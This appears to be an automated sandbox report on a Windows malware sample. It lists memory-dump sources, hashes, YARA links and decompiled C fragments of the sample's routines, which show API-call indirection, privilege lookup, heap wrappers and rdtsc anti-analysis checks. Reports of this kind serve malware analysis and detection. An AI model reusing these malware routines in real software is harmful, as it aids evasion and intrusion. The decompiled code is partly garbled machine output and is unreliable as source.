Instruction Fuzzy Hash: 3490027160101802D180725A540464E080557D1752FD1C529E0015A14DCA558A6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 1EB09A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB09A5A

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 42ee1dfd34bf831275ae2e338d8aa6c11c5a5d0fd5b6dc4c89eb97c724314adc
Instruction ID: 11679c6113d2d2054a58a7b774a5865553e21e6c06fc2fad012a8ed4ddfb4f1f
Opcode Fuzzy Hash: 42ee1dfd34bf831275ae2e338d8aa6c11c5a5d0fd5b6dc4c89eb97c724314adc
Instruction Fuzzy Hash: 7490026161181042D200766A5C14B0B080557D0753F91C629E0144914CC95588716561

Uniqueness

Uniqueness Score: -1.00%

Function 1EB097A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB097AA

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2826e3e5aebf31da3f4dcbcb86f5eb61096187870bf494ba3500ac3a374f26b
Instruction ID: e2b36cce4172a54b228c8f883ab753e1d1dc0c5af553f45a8b38c3fdd337b8d5
Opcode Fuzzy Hash: b2826e3e5aebf31da3f4dcbcb86f5eb61096187870bf494ba3500ac3a374f26b
Instruction Fuzzy Hash: 0090026170101003D140725A641860A4805A7E1752F91D525E0404914CD95588666262

Uniqueness

Uniqueness Score: -1.00%

Function 1EB09780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB0978A

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb3c08bee23e95765a379b34d538d3d044cf5a870dc5f74186eb25c0f2342831
Instruction ID: f45d85c3f0f396bcf1f25b3385e2786f218478437adfdf7d3ef942c226df3f94
Opcode Fuzzy Hash: cb3c08bee23e95765a379b34d538d3d044cf5a870dc5f74186eb25c0f2342831
Instruction Fuzzy Hash: B890026961301002D180725A640860E080557D1653FD1D929E0005918CC95588796361

Uniqueness

Uniqueness Score: -1.00%

Function 1EB09FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB09FEA

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a9587aebc5a262d975695f9cc9f5202dfc1206c9ff23ff9f230e0ff27156148
Instruction ID: c87a06aedc1948c936a50100c3d32b5e900d3fc8f03166847daf55037b8e1033
Opcode Fuzzy Hash: 1a9587aebc5a262d975695f9cc9f5202dfc1206c9ff23ff9f230e0ff27156148
Instruction Fuzzy Hash: 6F90027171115402D110725A940470A080557D1652F91C925E0814918D86D588A17162

Uniqueness

Uniqueness Score: -1.00%

Function 1EB09710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB0971A

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5893ba187e6a504f9691235ac27202b431a00f1ad750564fb371dfcbde7a6ebe
Instruction ID: abbcba8246e75bb3b05fcf649e67c007c63891be9d3b888f7b4f66268ad79282
Opcode Fuzzy Hash: 5893ba187e6a504f9691235ac27202b431a00f1ad750564fb371dfcbde7a6ebe
Instruction Fuzzy Hash: 8990027160101402D100769A640864A080557E0752F91D525E5014915EC6A588A17171

Uniqueness

Uniqueness Score: -1.00%

Function 1EB098F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB098FA

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 21f03c6bd23e65f85b24e1607119bd570479109f803e6768188c241d1eae385d
Instruction ID: f13c80342da174e5361a4366c43d4d233dc00740eda6682eba4ba33fad163bdd
Opcode Fuzzy Hash: 21f03c6bd23e65f85b24e1607119bd570479109f803e6768188c241d1eae385d
Instruction Fuzzy Hash: 6C900261A0101502D101725A540461A080A57D0692FD1C536E1014915ECA6589A2B171

Uniqueness

Uniqueness Score: -1.00%

Function 1EB09860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB0986A

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b38219ca9e7e99dbcf4c9cd88dc70d671d317d87c9f3c4a413df0c770d0a5988
Instruction ID: 5b9e6a146d12b1c52343f26bf9a03a09c8685ff3b76ae42eb79a90cc9bbe5597
Opcode Fuzzy Hash: b38219ca9e7e99dbcf4c9cd88dc70d671d317d87c9f3c4a413df0c770d0a5988
Instruction Fuzzy Hash: 5490027160101413D111725A550470B080957D0692FD1C926E0414918D96968962B161

Uniqueness

Uniqueness Score: -1.00%

Function 1EB09840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB0984A

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e6113d749caadf629216c5feebbe9033a703c4a1e26e257949d3282399e37ad
Instruction ID: d7b62886dc04cb082ab5d3589a19ff992b618946c29a66332f8dc26e6e3b859c
Opcode Fuzzy Hash: 3e6113d749caadf629216c5feebbe9033a703c4a1e26e257949d3282399e37ad
Instruction Fuzzy Hash: 6C900261642051525545B25A540450B480667E06927D1C526E1404D10C85669866E661

Uniqueness

Uniqueness Score: -1.00%

Function 1EB099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB099AA

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 84e9d573950a8acab9be012a2317ab27e7cdb46d9eef70211ca95ef3b5f9514f
Instruction ID: 4d42320232dcef7a21eddad86f5ffe2c18344e6db33be0b9821f4f5f12c7a63a
Opcode Fuzzy Hash: 84e9d573950a8acab9be012a2317ab27e7cdb46d9eef70211ca95ef3b5f9514f
Instruction Fuzzy Hash: D89002A174101442D100725A5414B0A080597E1752F91C529E1054914D8659CC627166

Uniqueness

Uniqueness Score: -1.00%

Function 1EB09910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB0991A

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4a8e02060acb5940ce4bd6c19af7b04dc659b3b21a89724aaf62a8b10983a18a
Instruction ID: f5afff05815256cdc6bcaefa187a1da3f33f3f86fbf304096a87d67e696bbeae
Opcode Fuzzy Hash: 4a8e02060acb5940ce4bd6c19af7b04dc659b3b21a89724aaf62a8b10983a18a
Instruction Fuzzy Hash: CC9002B160101402D140725A540474A080557D0752F91C525E5054914E86998DE576A5

Uniqueness

Uniqueness Score: -1.00%

Function 1EB09540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB0954A

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e86461d88c2bffa529424d3cf9f392e5d8b95258a81a73c2180f74a4335f15d0
Instruction ID: d6a44ecd7a727ffbdbed3fa46d318b5548b356c5937876cafb484136d42013af
Opcode Fuzzy Hash: e86461d88c2bffa529424d3cf9f392e5d8b95258a81a73c2180f74a4335f15d0
Instruction Fuzzy Hash: 20900265611010030105B65A170450B084657D57A2391C535F1005910CD66188716161

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004088C0(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebp;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_push( &_v24);
				_push(_t52);
				_t39 = 0; // executed
				_t24 = L00406E20( &_v24, __ecx); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					_push( &_v840);
					_push( &_v24);
					L00407030(_t24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0E0( &_v284, 0x104);
						_t42 =  &_v804;
						E0041A750( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t42 =  *(_t52 + 0x14);
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *(_t52 + 0x14);
						_t39 = 1;
						L8:
						_push( &_v840);
						_push( &_v24);
						_t33 = L00407060( &_v24, _t42);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_push( &_v24);
					_push(_t52); // executed
					_t34 = L004070E0(_t33,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *((intOrPtr*)(_t52 + 0x31)) + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088cb
0x004088d1
0x004088d2
0x004088d3
0x004088d5
0x004088da
0x004088df
0x004088ed
0x004088f1
0x004088f2
0x004088f7
0x00408900
0x0040890c
0x00408911
0x0040891f
0x00408924
0x00408927
0x00408930
0x00408942
0x00408947
0x0040894c
0x00000000
0x00000000
0x0040894e
0x00408952
0x00000000
0x00000000
0x00408954
0x00000000
0x00408952
0x00408956
0x00408959
0x0040895f
0x00408961
0x00408967
0x0040896b
0x0040896c
0x00408971
0x00408974
0x0040897f
0x00408980
0x00408981
0x0040898c
0x0040898e
0x00408994
0x00408998
0x0040899b
0x0040899b
0x004089a2
0x004089aa
0x004089b7
0x004088e6
0x004088e6
0x004088e6

Memory Dump Source

Source File: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23857c0378d08e713b0962bd06797abda6866aa9709ff00829a1edd27974e17f
Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
Opcode Fuzzy Hash: 23857c0378d08e713b0962bd06797abda6866aa9709ff00829a1edd27974e17f
Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 0040815D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040815D(void* __eflags, intOrPtr _a8, intOrPtr _a12) {
				struct _EXCEPTION_RECORD _v0;
				char _v8;
				intOrPtr _v12;
				char _v75;
				char _v76;
				short _v552;
				struct _CONTEXT _v584;
				char _v586;
				short _v588;
				signed int _t29;
				struct _EXCEPTION_RECORD _t50;
				void* _t56;
				void* _t58;
				void* _t63;

				_t63 = __eflags;
				asm("lodsd");
				asm("lodsb");
				_push(0x81ec8b55);
				_v588 = 0;
				E0041A130( &_v586, 0, 0x1fe);
				_v12 = 0x2d;
				_v76 = 0;
				E0041A130( &_v75, 0, 0x3f);
				E0041AD10( &_v76, 9);
				_t50 = _v0;
				_t29 = E00409B30(_t63, _t50 + 0x1c,  &_v76); // executed
				_t58 = _t56 - 0x244 + 0x28;
				 *(_t50 + 0xa18) = _t29;
				if(_t29 != 0) {
					 *(_t50 + 0xa18) =  *(_t50 + 4) ^ _t29;
					KiUserExceptionDispatcher(_t50,  &_v584); // executed
					_t58 = _t58 + 8;
				}
				_v552 = 0;
				E0041A510( &_v584,  &_v8, 0);
				if(_a8 != 0) {
					_t52 = _a12;
					if(_a12 != 0 && E0041A3A0( &_v584) <= 0x3a) {
						E0041A0B0(_t52,  &_v584, E0041A3A0( &_v584) + _t34 + 2);
					}
				}
				return 0;
			}

0x0040815d
0x0040815d
0x0040815e
0x0040815f
0x00408179
0x00408180
0x0040818d
0x00408194
0x00408198
0x004081a3
0x004081a8
0x004081b3
0x004081b8
0x004081bb
0x004081c3
0x004081d2
0x004081d8
0x004081dd
0x004081dd
0x004081ee
0x004081f5
0x00408201
0x00408203
0x00408208
0x00408237
0x0040823c
0x00408208
0x00408245

APIs

KiUserExceptionDispatcher.NTDLL(?,?), ref: 004081D8

Strings

-, xrefs: 0040818D

Memory Dump Source

Source File: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: DispatcherExceptionUser
String ID: -
API String ID: 6842923-2547889144
Opcode ID: afd4b19865c9fc643c3e31ceee8fdca55ba90edee12116da5951f7266cf29b26
Instruction ID: 7584bd8e00ecca98f57e71c5fea23c7c3bd2e675ef16cffa29b182ba117fe362
Opcode Fuzzy Hash: afd4b19865c9fc643c3e31ceee8fdca55ba90edee12116da5951f7266cf29b26
Instruction Fuzzy Hash: 97210772C112086AD724EBA0DE45BDF73B8DF04304F04459FA40967142FB74AB49CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00408160, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408160(void* __eflags, struct _EXCEPTION_RECORD _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v71;
				char _v72;
				short _v552;
				char _v582;
				struct _CONTEXT _v584;
				signed int _t29;
				struct _EXCEPTION_RECORD _t49;
				void* _t51;
				void* _t52;
				void* _t56;

				_t56 = __eflags;
				_v584 = 0;
				E0041A130( &_v582, 0, 0x1fe);
				_v8 = 0x2d;
				_v72 = 0;
				E0041A130( &_v71, 0, 0x3f);
				E0041AD10( &_v72, 9);
				_t49 = _a4;
				_t29 = E00409B30(_t56, _t49 + 0x1c,  &_v72); // executed
				_t52 = _t51 + 0x28;
				 *(_t49 + 0xa18) = _t29;
				if(_t29 != 0) {
					 *(_t49 + 0xa18) =  *(_t49 + 4) ^ _t29;
					KiUserExceptionDispatcher(_t49,  &_v584); // executed
					_t52 = _t52 + 8;
				}
				_v552 = 0;
				E0041A510( &_v584,  &_v8, 0);
				if(_a8 != 0) {
					_t50 = _a12;
					if(_a12 != 0 && E0041A3A0( &_v584) <= 0x3a) {
						E0041A0B0(_t50,  &_v584, E0041A3A0( &_v584) + _t34 + 2);
					}
				}
				return 0;
			}

0x00408160
0x00408179
0x00408180
0x0040818d
0x00408194
0x00408198
0x004081a3
0x004081a8
0x004081b3
0x004081b8
0x004081bb
0x004081c3
0x004081d2
0x004081d8
0x004081dd
0x004081dd
0x004081ee
0x004081f5
0x00408201
0x00408203
0x00408208
0x00408237
0x0040823c
0x00408208
0x00408245

APIs

KiUserExceptionDispatcher.NTDLL(?,?), ref: 004081D8

Strings

-, xrefs: 0040818D

Memory Dump Source

Source File: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: DispatcherExceptionUser
String ID: -
API String ID: 6842923-2547889144
Opcode ID: 4962e014442806759a33c5c39919b5773fef745807da4126db40f74e2b1b434a
Instruction ID: dce7b4654e51871546c5ecb8a57178bb7fb86ae0d121bdcd9637ce89e876311e
Opcode Fuzzy Hash: 4962e014442806759a33c5c39919b5773fef745807da4126db40f74e2b1b434a
Instruction Fuzzy Hash: ED21A472C11218AADB24FBA0DE45FDF73B8DF04314F00459EA909A7181FA78AB448B96

Uniqueness

Uniqueness Score: -1.00%

Function 004188D2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E004188D2(void* __edi, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t10;

				asm("loop 0xffffffbb");
				asm("stosd");
				asm("loop 0xffffffcd");
				asm("adc esi, [esi]");
				asm("a16 cli");
				asm("std");
				_push(_t19);
				_t7 = _v0;
				_t3 = _t7 + 0xc74; // 0xc74
				E004191D0(__edi, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t10;
			}

0x004188d5
0x004188d7
0x004188d8
0x004188db
0x004188dd
0x004188df
0x004188e0
0x004188e3
0x004188ef
0x004188f7
0x0041890d
0x00418911

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD

Strings

&5A, xrefs: 004188C2, 004188CC

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: fba5486c192a39c11077e04983a5713cb07e051a0afd4ee3861ad0ccf9b28661
Instruction ID: f0c2f0e04a0ea6fd07091886418cea278941dcfa5cf81bd0d75be5f2a663c3dd
Opcode Fuzzy Hash: fba5486c192a39c11077e04983a5713cb07e051a0afd4ee3861ad0ccf9b28661
Instruction Fuzzy Hash: 5FF027B64082446FEB04FA78AC868D777989EC03187254A5EF84853203D235D45986F5

Uniqueness

Uniqueness Score: -1.00%

Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34); // executed
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188b7
0x004188c2
0x004188cd
0x004188d1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD

Strings

&5A, xrefs: 004188C2, 004188CC

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 518a694957189e9484c3970cdafd744962311bef32feec336ddc3a5ec246254a
Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
Opcode Fuzzy Hash: 518a694957189e9484c3970cdafd744962311bef32feec336ddc3a5ec246254a
Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00408AA0, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00408AA0(intOrPtr __eax, signed int __ecx, signed int __edx, void* __eflags, struct _EXCEPTION_RECORD _a4) {
				void* __ebp;
				intOrPtr _t15;
				intOrPtr _t16;
				signed int _t17;
				signed int _t21;
				void* _t23;
				void* _t27;
				signed int _t30;
				struct _EXCEPTION_RECORD _t32;

				_t30 = __edx;
				_t29 = __ecx;
				_t15 = __eax;
				_t32 = _a4;
				 *_t32 = 0xffffffff; // executed
				KiUserExceptionDispatcher(_t32, ??); // executed
				_push(_t32);
				 *((intOrPtr*)(_t32 + 0x10)) = _t15;
				_t16 = L00416CF0(_t15);
				 *((intOrPtr*)(_t32 + 8)) = _t16;
				if(_t16 != 0) {
					_t17 = E00408600(_t16, _t29);
					__eflags = _t17 - 0x300;
					 *((char*)(_t32 + 0x34)) = _t17 & 0xffffff00 | _t17 - 0x00000300 > 0x00000000;
					__eflags = E004198E0(E00413D80(_t32, 0x73));
					if(__eflags != 0) {
						_t29 =  *(_t32 + 4);
						_t8 = _t32 + 0x4ac;
						 *_t8 =  *(_t32 + 0x4ac) ^  *(_t32 + 4);
						__eflags =  *_t8;
						 *((char*)(_t32 + 0x33)) = 1;
					}
					_t21 = E00419520(_t29, __eflags, _t32); // executed
					 *(_t32 + 0xc) = _t21;
					__eflags = _t21;
					if(_t21 == 0) {
						goto L1;
					} else {
						_t23 = E00408600(_t21, _t29);
						__eflags = _t23 - 0x300;
						_t13 = _t23 - 0x300 > 0;
						__eflags = _t13;
						 *((char*)(_t32 + 0x35)) = _t30 & 0xffffff00 | _t13;
						E004088C0(_t29, __eflags, _t32); // executed
						E00408250(_t29, __eflags, _t32);
						E004084B0(_t32);
						_t27 = E00408320(__eflags, _t32);
						_push(_t32);
						return L00406CF0(_t27, _t29);
					}
				} else {
					L1:
					return 0;
				}
			}

0x00408aa0
0x00408aa0
0x00408aa0
0x00408aa4
0x00408aa8
0x00408aae
0x00408ab3
0x00408ab4
0x00408ab7
0x00408abf
0x00408ac4
0x00408acb
0x00408ad0
0x00408adb
0x00408aec
0x00408aee
0x00408af0
0x00408af3
0x00408af3
0x00408af3
0x00408af9
0x00408af9
0x00408afe
0x00408b06
0x00408b09
0x00408b0b
0x00000000
0x00408b0d
0x00408b0d
0x00408b12
0x00408b17
0x00408b17
0x00408b1b
0x00408b1e
0x00408b24
0x00408b2a
0x00408b30
0x00408b35
0x00408b40
0x00408b40
0x00408ac6
0x00408ac6
0x00408aca
0x00408aca

APIs

KiUserExceptionDispatcher.NTDLL(?), ref: 00408AAE

Memory Dump Source

Source File: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6a27115d0da0be0d8c15840ffc311b0517aa68a53367f9fe1c7bb206d975661b
Instruction ID: 418701799975ee8251baef5e6432e5436d79c71011b7002687027b2a28f4b449
Opcode Fuzzy Hash: 6a27115d0da0be0d8c15840ffc311b0517aa68a53367f9fe1c7bb206d975661b
Instruction Fuzzy Hash: B6010871506B1125C6113B766D426CB36CC5F12318B04483FF4D5B2683EE7DE2448AAE

Uniqueness

Uniqueness Score: -1.00%

Function 00418A31, Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E00418A31(signed int __eax, void* __ebx, signed int* __edx, void* __edi, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t11;

				asm("into");
				 *__edx =  *__edx ^ __eax;
				0xb8a9a016(__edi);
				asm("lahf");
				_t8 = _v0;
				E004191D0(__edi, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t8 + 0xa18)), 0, 0x46);
				_t11 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t11;
			}

0x00418a31
0x00418a38
0x00418a3a
0x00418a3f
0x00418a43
0x00418a5a
0x00418a70
0x00418a74

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00418A70

Memory Dump Source

Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp Download File
Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp Download File

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7a8675bf2638d37e74b0262aa7bdb59dcf8a51ff62f6762a7c6d1bd95ccfcd0e
Instruction ID: 297ad59f8ec62c0f498e25c079dde4ef7eaf314fb1e867fffb1ae641d5c2135b
Opcode Fuzzy Hash: 7a8675bf2638d37e74b0262aa7bdb59dcf8a51ff62f6762a7c6d1bd95ccfcd0e
Instruction Fuzzy Hash: 6CF08C71200305BBDB10DF59CC85ED737ACAF85620F008295F9185B282C934E840C7B5

Uniqueness

Uniqueness Score: -1.00%

Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a5a
0x00418a70
0x00418a74

APIs

